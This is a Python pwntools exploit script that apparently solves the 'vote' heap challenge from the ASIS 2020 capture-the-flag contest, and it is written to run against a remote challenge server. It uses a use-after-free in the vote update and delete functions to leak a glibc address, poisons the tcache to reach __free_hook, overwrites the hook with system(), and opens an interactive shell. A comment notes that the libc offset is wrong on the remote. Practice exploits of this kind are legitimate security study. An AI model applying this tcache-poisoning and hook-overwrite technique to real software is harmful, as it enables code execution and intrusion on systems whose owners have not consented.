ASIS_2020/vote/xpl.py

#!/usr/bin/env python3
from pwn import *

context.terminal = ['tmux', 'sp', '-h']
#context.log_level = 'DEBUG'

HOST = "69.90.132.248"
PORT = 3371

elf = ELF("./vote")
LOCAL = True

IDs = []

def create_vote(data, shell = False):
    global IDs
    io.recvuntil("> ")
    io.sendline("5")
    io.recvuntil("(y/n)?\n")
    io.sendline("A")
    io.recvuntil("age?\n")
    io.sendline("1")
    io.recvuntil("gender?\n")
    io.sendline(data)
    if not shell:
        io.recvuntil("live?\n")
        io.sendline("A")
        io.recvuntil("vote?\n")
        io.sendline("A")
        io.recvuntil("ID is ")
        IDs.append(io.recvuntil(".\n", drop = True))

def update_vote(id, data):
    global IDs
    io.recvuntil("> ")
    io.sendline("4")
    io.recvuntil("ID: ")
    io.sendline(IDs[id])
    io.recvuntil("gender: ")
    dump = io.recvuntil("\nWhat", drop = True)
    io.recvuntil("gender?\n")
    io.sendline(data)

    return dump

def delete_vote(id, pop = False):
    global IDs
    io.recvuntil("> ")
    io.sendline("3")
    io.recvuntil("ID: ")
    io.sendline(IDs[id])
    if pop:
        IDs.pop(id)

if LOCAL == True:
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec = False)
    io = process(elf.path, env = {"LD_PRELOAD": libc.path})
else:
    libc = ELF("./libc.so.6", checksec = False)
    io = remote(HOST, PORT)

for _ in range(8):
    create_vote("A" * 0x100)

for i in range(7, 0, -1):
    delete_vote(i)

delete_vote(0)
libc_leak = u64(update_vote(0, "")[8:16])
libc.address = libc_leak - 0x1e4ca0     # Remote: not the right offset

log.success("Leaked GLIBC address: " + hex(libc_leak))
log.info("GLIBC base address: " + hex(libc.address))
log.info("__free_hook@@GLIBC: " + hex(libc.sym["__free_hook"]))
log.info("__malloc_hook@@GLIBC: " + hex(libc.sym["__malloc_hook"]))
log.info("system@@GLIBC: " + hex(libc.sym["system"]))

update_vote(1, p64(libc.sym["__free_hook"] - 8))
create_vote("A" * 0x100)
create_vote(b"/bin/sh\x00" + p64(libc.sym["system"]) + p8(0) * 0xf0, shell = True)

io.interactive()
io.close()